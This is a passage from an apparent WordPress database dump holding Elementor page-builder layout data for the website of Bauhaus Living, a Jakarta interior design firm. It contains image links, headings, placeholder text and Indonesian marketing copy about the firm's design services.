"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\" Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living\",\"title\":\"Wujudkan mimpi anda sekarang!\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4505,4969,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4506,4969,'_elementor_pro_version','3.8.1'),(4507,4969,'_elementor_css','a:6:{s:4:\"time\";i:1695377587;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4508,4970,'_wp_page_template','elementor_header_footer'),(4509,4970,'_elementor_edit_mode','builder'),(4510,4970,'_elementor_template_type','wp-page'),(4511,4970,'_elementor_version','3.8.1'),(4512,4970,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan 